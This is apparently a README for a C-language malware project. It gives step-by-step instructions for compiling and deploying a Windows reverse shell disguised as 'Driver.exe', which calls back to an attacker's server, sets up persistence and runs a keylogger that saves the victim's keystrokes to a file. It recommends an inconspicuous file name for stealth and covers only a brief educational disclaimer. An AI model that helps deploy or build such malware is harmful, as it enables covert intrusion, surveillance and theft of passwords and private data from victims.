DISCLAIMER: this project should be used only for educational purposes. You should not use it on a victim without written consent.
This project is a malware written in C language that allows you to get a shell on a Windows victim and execute Windows commands as well as obtain persistence. It also acts as a keylogger.
On your Linux machine, compile the client and the server (don't forget to change the IPs and the port):
gcc server.c -o server
i686-w64-mingw32-gcc -o Driver.exe client.c -lwsock32 -lwininet
You can change the name of the .exe file. For stealthiness, choose something that doesn't attract attention.
- Transfer the file server.exe on the target machine.
- Start your server with the arguments: port and IP of your attack machine.
./server <ip> <port>
- Execute the malicious file on the target machine (you can double-click the executable).
.\Driver.exe
Check your Linux terminal. You now have a shell!
You can execute all of the Windows commands, as well as:
persist
This will ensure persistence, so if the victim logs out / turns off the machine, when they go back online they will connect to you.
keylog
This will start a keylogger that will save everything the victim types (it is saved in C:\tmp\windows.txt).
Special thanks to Aleksa Tamburkovski.